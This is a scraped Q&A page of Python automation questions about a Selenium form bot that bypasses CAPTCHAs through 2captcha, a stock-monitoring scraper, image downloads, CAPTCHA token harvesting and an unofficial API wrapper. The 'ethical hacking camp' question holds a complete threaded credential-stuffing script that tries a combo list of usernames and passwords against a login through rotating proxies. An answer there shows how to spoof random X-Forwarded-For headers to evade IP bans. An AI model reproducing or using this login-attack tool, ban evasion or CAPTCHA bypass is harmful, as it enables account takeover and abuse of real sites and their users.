How to solve a Python Selenium 2captcha problem? - python

Here is my code.
# assumes: import random, requests; from time import sleep, time; from selenium.webdriver.support.ui import Select
while True:
    username_box = self.driver.find_element_by_xpath(
        '//*[@id="snapname"]')
    username_box.send_keys('xxxx')
    sleep(2)
    age_select = Select(self.driver.find_element_by_id('age'))
    age_select.select_by_value(random.choice(age_values))
    sleep(2)
    gender_select = Select(self.driver.find_element_by_id('gender'))
    gender_select.select_by_value('female')
    sleep(2)
    add_me_btn = self.driver.find_element_by_id('submitBtn')
    add_me_btn.click()
    try:
        logout = self.driver.find_element_by_xpath(
            '//*[@id="wrap"]/div[1]/div/div[2]/ul/li/a')
        logout.click()
        sleep(2)
        logout1 = self.driver.find_element_by_xpath(
            "//*[@id='wrap']/div[1]/div/div[2]/ul/li/ul/li/a")
        logout1.click()
        sleep(5)
    except:
        service_key = 'Service key here'
        google_site_key = 'Site key here'
        pageurl = 'Page Url Here'
        url = ("http://2captcha.com/in.php?key=" + service_key +
               "&method=userrecaptcha&googlekey=" + google_site_key +
               "&pageurl=" + pageurl)
        resp = requests.get(url)
        if resp.text[0:2] != 'OK':
            quit('Service error. Error Code' + resp.text)
        captcha_id = resp.text[3:]
        fetch_url = ("http://2captcha.com/res.php?key=" + service_key +
                     "&action=get&id=" + captcha_id)
        start_time = time()  # start timing before polling for the answer
        for i in range(1, 20):
            sleep(5)
            resp = requests.get(fetch_url)
            if resp.text[0:2] == 'OK':
                break
        print('Time to solve:', time() - start_time)
        submit_url = "urlhere"
        headers = {
            'user-agent': 'Mozilla/5.0 Chrome/52.0.2743.116 Safari/537.36'}
        payload = {
            'submit': 'submit',
            'g-recaptcha-response': resp.text[3:]
        }
        resp = requests.post(submit_url, headers=headers, data=payload)
I'm trying to solve the captcha for a site, and I'm using 2captcha for this job. However, this code can't solve the captcha. The bot works up to this line:
print('Time to solve:', time() - start_time)
After that it just returns to the beginning of the while loop. What could be wrong with this code?

Have you checked if your captchas were sent to 2captcha? I mean here: https://2captcha.com/statistics/uploads
And what status do they have if they are there?
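One thing the posted code never does is put the solved token back into the page that the Selenium driver is controlling; posting it with requests in a separate session won't affect the page the browser has open. As a minimal sketch (assuming the page uses a standard reCAPTCHA v2 widget with the usual hidden g-recaptcha-response textarea; submitBtn is the id from your own code), you could inject the token with execute_script before submitting:
# hedged sketch: push the 2captcha answer into the Selenium-controlled page
token = resp.text[3:]  # res.php returns 'OK|<token>'; strip the 'OK|' prefix
self.driver.execute_script(
    "document.getElementById('g-recaptcha-response').style.display = 'block';"
)
self.driver.execute_script(
    "document.getElementById('g-recaptcha-response').innerHTML = arguments[0];",
    token,
)
# then trigger the form's own submit button instead of posting with requests
self.driver.find_element_by_id('submitBtn').click()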

Related

New products added to the site are not detected by the bot while web scraping in a loop [Python]

I have a bot for web scraping and it works fine. The only problem is that when a new product appears on the site, it is not detected by the bot; I have to relaunch the script for it to find it. Do you have any solutions to this?
import requests
import time
import datetime
from discord import send_hook
from datetime import datetime
from colorama import Fore, Back, Style
from bs4 import BeautifulSoup
from colorama import init

init(autoreset=True)

headers = {
    'user-agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36',
    "Referer": "https://www.ldlc.com/"
}
a = 0
x = 0  # request counter (was undefined in the original loop)

def liens():
    # for x in range(1, 5):
    url = f'https://www.ldlc.com/recherche/1660/+fcat-4684.html?sort=1'
    reqs = requests.get(url, headers=headers, timeout=None, allow_redirects=False)
    soup = BeautifulSoup(reqs.text, 'html.parser')
    urls = []
    productlist = soup.find_all('h3', {'class': 'title-3'})
    for item in productlist:
        for link in item.find_all('a', href=True):
            urls.append("https://www.ldlc.com" + link['href'])
    print(f"Le nombre de request URL's : {a}")
    return urls

prix = 400
wait_time = 259200
timed_pid = {p: 0 for p in liens()}

while True:
    try:
        liens()
        a = a + 1
        print(f"Le nombre de request : {x}")
        x = x + 1
        nombre_total_liens = len(liens())
        print(f'Le nombre de liens trouvé : {nombre_total_liens}')
    except:
        print("Connection refused by the server..")
        print("Let me sleep for 5 seconds")
        print("ZZzzzz...")
        time.sleep(5)
        print("Was a nice sleep, now let me continue...")
        continue
    time.sleep(15)
    for p in timed_pid:
        if (time.time() - timed_pid[p]) < wait_time:
            continue
        url = "{}".format(p)
        response = url
        while response == url:
            try:
                response = requests.get(url, headers=headers, timeout=None, allow_redirects=False)
                break
            except:
                print("Connection refused by the server..")
                print("Let me sleep for 5 seconds")
                print("ZZzzzz...")
                time.sleep(5)
                print("Was a nice sleep, now let me continue...")
                continue
        soup = BeautifulSoup(response.text, 'html.parser')
        try:
            title = soup.find('h1', class_='title-1').get_text().strip()
            product_title = ':flag_fr:' + title
        except:
            print('Impossible de lire le titre du produit! Restart....')
            continue
        now = datetime.now()
        current_time = now.strftime("%H:%M:%S")
        time_now = now.strftime("%d/%m/%Y - %H:%M:%S")
        try:
            image_url = soup.find('img', {'id': 'ctl00_cphMainContent_ImgProduct'})['src']
        except:
            continue
        try:
            stock_statut = soup.find('div', class_='content').get_text().strip()
            price = soup.find_all('div', class_='price')[3].get_text(strip=True).replace(',', '.').replace(' ', '').replace('€', '.').replace(' ', '').replace('\xa0', '')
            if stock_statut == 'Rupture':
                print('[{}]'.format(current_time), Fore.GREEN + Style.RESET_ALL, Fore.YELLOW + '[LDLC]' + Style.RESET_ALL, '|', Fore.RED + 'Rupture' + Style.RESET_ALL, Fore.CYAN + product_title + Style.RESET_ALL)
            else:
                f = float(price)
                if f < prix:
                    print('[{}]'.format(current_time), Fore.GREEN + Style.RESET_ALL, Fore.YELLOW + '[LDLC]' + Style.RESET_ALL, '|', Fore.GREEN + 'En stock' + Style.RESET_ALL, Fore.CYAN + product_title + Style.RESET_ALL)
                    timed_pid[p] = time.time()
                    send_hook(product_title, url, image_url, price, stock_statut, time_now)
        except:
            continue
Also, if you have improvements for speed or anything else, I will take them.
If you could help me, that would make me happy. Thank you in advance.
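One likely reason new products are missed: timed_pid is built once, before the while loop, so any link that liens() finds later never gets an entry and is never polled. A minimal sketch of a fix (assuming the rest of the script stays as posted) is to merge freshly scraped links into the dict at the top of each iteration, right after the existing liens() call:
# hedged sketch: refresh the product dict each pass so newly listed links get polled
for lien in liens():
    if lien not in timed_pid:
        timed_pid[lien] = 0  # new product: never notified yet, so it is checked immediately
Entries start at 0, so a newly discovered product is checked on the very next pass without relaunching the script.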

Python - save images to folder after requests

I have this function that fetches a bunch of images:
def get_player_images_with_api():
    url = 'https://footballapi.pulselive.com/football/players?pageSize=30&compSeasons=274&altIds=true&page={page}&type=player&id=-1&compSeasonId=274'
    img_url = 'https://resources.premierleague.com/premierleague/photos/players/250x250/{player_id}.png'
    headers = {'Origin': 'https://www.premierleague.com'}
    page = 0
    while True:
        try:
            data = requests.get(url.format(page=page), headers=headers).json()
            for player in data['content']:
                print('{:<50} {}'.format(player['name']['display'], img_url.format(player_id=player['altIds']['opta'])))
            sleep(2)
            page += 1
        except:
            break
How do I dynamically save each image to a 'path/to/image' folder in player['name'].png format?
Here you go :)
import requests
from time import sleep
import urllib.request

def get_player_images_with_api():
    url = 'https://footballapi.pulselive.com/football/players?pageSize=30&compSeasons=274&altIds=true&page={page}&type=player&id=-1&compSeasonId=274'
    img_url = 'https://resources.premierleague.com/premierleague/photos/players/250x250/{player_id}.png'
    headers = {'Origin': 'https://www.premierleague.com'}
    page = 0
    while True:
        try:
            data = requests.get(url.format(page=page), headers=headers).json()
            for player in data['content']:
                print('{:<50} {}'.format(
                    player['name']['display'],
                    img_url.format(player_id=player['altIds']['opta'])))
                urllib.request.urlretrieve(
                    img_url.format(player_id=player['altIds']['opta']),
                    player['name']['display'] + ".png")
            sleep(2)
            page += 1
        except:
            break
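The answer above saves each file into the current working directory. If you specifically want them under a 'path/to/image' folder (the folder name is the one from the question), a hedged variation using requests and os could look like this; save_player_image is just an illustrative helper name:
import os
import requests

def save_player_image(name, image_url, folder='path/to/image'):
    # hedged sketch: download one image with requests and write it into a folder
    os.makedirs(folder, exist_ok=True)  # create the folder if it is missing
    resp = requests.get(image_url, headers={'Origin': 'https://www.premierleague.com'})
    if resp.status_code == 200:
        with open(os.path.join(folder, name + '.png'), 'wb') as f:
            f.write(resp.content)
It could be called inside the for loop as save_player_image(player['name']['display'], img_url.format(player_id=player['altIds']['opta'])).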

Setting an expiration on a function for a retry

I am harvesting captchas, and captcha responses are only good for 2 minutes. I am trying to figure out how to set up an "expired, fetch again" routine.
# assumes: import requests, time; from colorama import Fore; APItoken, sitekey and url are defined elsewhere
def captchaToken():
    global captoken
    s = requests.Session()
    # here we post the site key to 2captcha to get the captcha ID (and we parse it here too)
    captcha_id = s.post("http://2captcha.com/in.php?key={}&method=userrecaptcha&googlekey={}&pageurl={}".format(APItoken, sitekey, url)).text.split('|')[1]
    # time.sleep(5)
    print("Waiting for captcha...")
    # then we parse the g-response from the 2captcha response
    recaptcha_answer = s.get("http://2captcha.com/res.php?key={}&action=get&id={}".format(APItoken, captcha_id)).text
    print("Solving captcha...")
    while 'CAPCHA_NOT_READY' in recaptcha_answer:
        print("Waiting for a response . . .")
        time.sleep(2.5)
        recaptcha_answer = s.get("http://2captcha.com/res.php?key={}&action=get&id={}".format(APItoken, captcha_id)).text
    recaptcha_answer = recaptcha_answer.split('|')[1]
    captoken = recaptcha_answer
    print(Fore.MAGENTA + "Captcha Response: " + recaptcha_answer)
I'd suggest:
while 1:
    captcha = get_captcha()
    request = post_captcha(captcha)
    start = time.time()
    while 1:
        response = poll_for_result(request)
        if start + 120 < time.time():
            time_is_up()
            break
        if response:
            return deal_with_response(response)
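Filling that outline in with the 2captcha endpoints from the question gives something like the sketch below. Hedged: fetch_token and the 120-second budget are my own names and assumptions, and the error branches of the 2captcha API are not handled here.
import time
import requests

def fetch_token(api_token, site_key, page_url, budget=120):
    # hedged sketch: keep requesting captchas until one is solved within the budget
    while True:
        captcha_id = requests.post(
            "http://2captcha.com/in.php?key={}&method=userrecaptcha&googlekey={}&pageurl={}".format(
                api_token, site_key, page_url)).text.split('|')[1]
        start = time.time()
        while time.time() - start < budget:
            answer = requests.get(
                "http://2captcha.com/res.php?key={}&action=get&id={}".format(
                    api_token, captcha_id)).text
            if answer.startswith('OK|'):
                return answer.split('|')[1]  # solved in time, still fresh
            time.sleep(2.5)
        print("Expired, fetching again")  # budget used up, request a fresh captcha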

Sending Asynchronous requests with Python requests library

As part of an ethical hacking camp, I am working on an assignment where I have to make multiple login requests on a website using proxies. To do that I've come up with the following code:
import requests
from Queue import Queue
from threading import Thread
import time
from lxml import html
import json
from time import sleep
from math import ceil  # ceil() is used when printing the average at the end

global proxy_queue
global user_queue
global hits
global stats
global start_time

def get_default_header():
    return {
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:54.0) Gecko/20100101 Firefox/54.0',
        'X-Requested-With': 'XMLHttpRequest',
        'Referer': 'https://www.example.com/'
    }

def make_requests():
    global user_queue
    while True:
        uname_pass = user_queue.get().split(':')
        status = get_status(uname_pass[0], uname_pass[1].replace('\n', ''))
        if status == 1:
            hits.put(uname_pass)
            stats['hits'] += 1
        if status == 0:
            stats['fake'] += 1
        if status == -1:
            user_queue.put(':'.join(uname_pass))
            stats['IP Banned'] += 1
        if status == -2:
            stats['Exception'] += 1
        user_queue.task_done()

def get_status(uname, password):
    global proxy_queue
    try:
        if proxy_queue.empty():
            print 'Reloaded proxies, sleeping for 2 mins'
            sleep(120)
        session = requests.session()
        proxy = 'http://' + proxy_queue.get()
        login_url = 'http://example.com/login'
        header = get_default_header()
        header['X-Forwarded-For'] = '8.8.8.8'
        login_page = session.get(
            login_url,
            headers=header,
            proxies={
                'http': proxy
            }
        )
        tree = html.fromstring(login_page.text)
        csrf = list(set(tree.xpath("//input[@name='csrfmiddlewaretoken']/@value")))[0]
        payload = {
            'email': uname,
            'password': password,
            'csrfmiddlewaretoken': csrf,
        }
        result = session.post(
            login_url,
            data=payload,
            headers=header,
            proxies={
                'http': proxy
            }
        )
        if result.status_code == 200:
            if 'access_token' in session.cookies:
                return 1
            elif 'Please check your email and password.' in result.text:
                return 0
            else:
                # IP banned
                return -1
        else:
            # IP banned
            return -1
    except Exception as e:
        print e
        return -2

def populate_proxies():
    global proxy_queue
    proxy_queue = Queue()
    with open('nice_proxy.txt', 'r') as f:
        for line in f.readlines():
            proxy_queue.put(line.replace('\n', ''))

def hit_printer():
    while True:
        sleep(5)
        print '\r' + str(stats) + ' Combos/min: ' + str((stats['hits'] + stats['fake'])/((time.time() - start_time)/60)),

if __name__ == '__main__':
    global user_queue
    global proxy_queue
    global stats
    global start_time
    stats = dict()
    stats['hits'] = 0
    stats['fake'] = 0
    stats['IP Banned'] = 0
    stats['Exception'] = 0
    threads = 200
    hits = Queue()
    uname_password_file = '287_uname_pass.txt'
    populate_proxies()
    user_queue = Queue(threads)
    for i in range(threads):
        t = Thread(target=make_requests)
        t.daemon = True
        t.start()
    hit_printer = Thread(target=hit_printer)  # note: this rebinds the name hit_printer to the Thread object
    hit_printer.daemon = True
    hit_printer.start()
    start_time = time.time()
    try:
        count = 0
        with open(uname_password_file, 'r') as f:
            for line in f.readlines():
                count += 1
                if count > 2000:
                    break
                user_queue.put(line.replace('\n', ''))
        user_queue.join()
        print '####################Result#####################'
        while not hits.empty():
            print hits.get()
        ttr = round(time.time() - start_time, 3)
        print 'Time required: ' + str(ttr)
        print 'average combos/min: ' + str(ceil(2000/(ttr/60)))
    except Exception as e:
        print e
So it is expected to make many requests on the website through multiple threads, but it doesn't work as expected. After a few requests, the proxies get banned and it stops working. Since I'm disposing of each proxy after I use it, that shouldn't be the case. So I believe it might be due to one of the following:
In making multiple requests with multiple sessions, the sessions somehow fail to stay separate because the requests aren't truly asynchronous.
The victim site bans IPs by group, e.g., banning all IPs starting with 132.x.x.x after receiving multiple requests from any of the 132.x.x.x IPs.
The victim site is using headers like 'X-Forwarded-For', 'Client-IP', 'Via', or a similar header to detect the originating IP. But that seems unlikely, because I can log in via my browser, without any proxy, and it doesn't throw any error, meaning my IP isn't exposed in any sense.
I am unsure whether I'm making an error in the threading part or the requests part; any help is appreciated.
I have figured out what the problem was, thanks to @Martijn Pieters; as usual, he's a life saver.
I was using elite-level proxies, and there was no way the victim site could have found my IP address; however, it was using X-Forwarded-For to detect my root IP address.
Since elite-level proxies do not expose the IP address and don't attach the Client-IP header, the only way the victim could detect my IP was via the latest address in X-Forwarded-For. The solution to this problem is setting the X-Forwarded-For header to a random IP address every time a request is made, which successfully spoofs the victim site into believing that the request is legit.
header['X-Forwarded-For'] = '.'.join([str(random.randint(0,255)) for i in range(4)])
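For context, that line is meant to replace the hard-coded header['X-Forwarded-For'] = '8.8.8.8' in get_status(). A small hedged sketch of how it slots in; random is an import the posted code doesn't show, and random_ip is just an illustrative helper name:
import random

def random_ip():
    # hedged helper: build a random dotted-quad for the X-Forwarded-For header
    return '.'.join([str(random.randint(0, 255)) for i in range(4)])

header = get_default_header()
header['X-Forwarded-For'] = random_ip()  # different spoofed client IP on every request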

How do you print a function that returns a request in Python?

I have a function that gets the profile data of a user:
API.py
def getProfileData(self):
    data = json.dumps({
        '_uuid': self.uuid,
        '_uid': self.username_id,
        '_csrftoken': self.token
    })
    return self.SendRequest('accounts/current_user/?edit=true', self.generateSignature(data))
I want to print the returned request in the terminal, so I did this:
test.py
from API import API
API = API("username", "password")
API.login() # login
print(API.getProfileData())
But nothing is logged in the console.
Maybe I'm doing it the JavaScript way, since that's my background.
What's the correct way to do it?
EDIT:
This is what's inside SendRequest:
def SendRequest(self, endpoint, post=None, login=False):
    if (not self.isLoggedIn and not login):
        raise Exception("Not logged in!\n")
        return;
    self.s.headers.update({'Connection': 'close',
                           'Accept': '*/*',
                           'Content-type': 'application/x-www-form-urlencoded; charset=UTF-8',
                           'Cookie2': '$Version=1',
                           'Accept-Language': 'en-US',
                           'User-Agent': self.USER_AGENT})
    if (post != None):  # POST
        response = self.s.post(self.API_URL + endpoint, data=post)  # , verify=False
    else:  # GET
        response = self.s.get(self.API_URL + endpoint)  # , verify=False
    if response.status_code == 200:
        self.LastResponse = response
        self.LastJson = json.loads(response.text)
        return True
    else:
        print("Request return " + str(response.status_code) + " error!")
        # for debugging
        try:
            self.LastResponse = response
            self.LastJson = json.loads(response.text)
        except:
            pass
        return False

def getTotalFollowers(self, usernameId):
    followers = []
    next_max_id = ''
    while 1:
        self.getUserFollowers(usernameId, next_max_id)
        temp = self.LastJson
        for item in temp["users"]:
            followers.append(item)
        if temp["big_list"] == False:
            return followers
        next_max_id = temp["next_max_id"]

def getTotalFollowings(self, usernameId):
    followers = []
    next_max_id = ''
    while 1:
        self.getUserFollowings(usernameId, next_max_id)
        temp = self.LastJson
        for item in temp["users"]:
            followers.append(item)
        if temp["big_list"] == False:
            return followers
        next_max_id = temp["next_max_id"]

def getTotalUserFeed(self, usernameId, minTimestamp=None):
    user_feed = []
    next_max_id = ''
    while 1:
        self.getUserFeed(usernameId, next_max_id, minTimestamp)
        temp = self.LastJson
        for item in temp["items"]:
            user_feed.append(item)
        if temp["more_available"] == False:
            return user_feed
        next_max_id = temp["next_max_id"]
If all you want to do is print the response that you get back, you can do that in SendRequest, but I suspect that your real problem is that you are self-serializing your post data when requests does that for you. In any case, since your question is about printing:
if response.status_code == 200:
    print('Yay, my response was: %s' % response.content)
    self.LastResponse = response
    self.LastJson = json.loads(response.text)
    return True
else:
    print("Request return " + str(response.status_code) + " error!")
    # for debugging
    try:
        self.LastResponse = response
        self.LastJson = json.loads(response.text)
    except:
        pass
    return False
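Note that getProfileData() ultimately returns whatever SendRequest() returns, i.e. True or False, so print(API.getProfileData()) can only ever show a boolean. If the goal is to see the profile JSON itself, a hedged alternative (relying only on the LastJson and LastResponse attributes that SendRequest already sets) is:
from API import API

api = API("username", "password")
api.login()
if api.getProfileData():  # returns True on a 200 response
    print(api.LastJson)   # the parsed JSON body stored by SendRequest
else:
    print(api.LastResponse.status_code)  # set in the error branch for debugging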
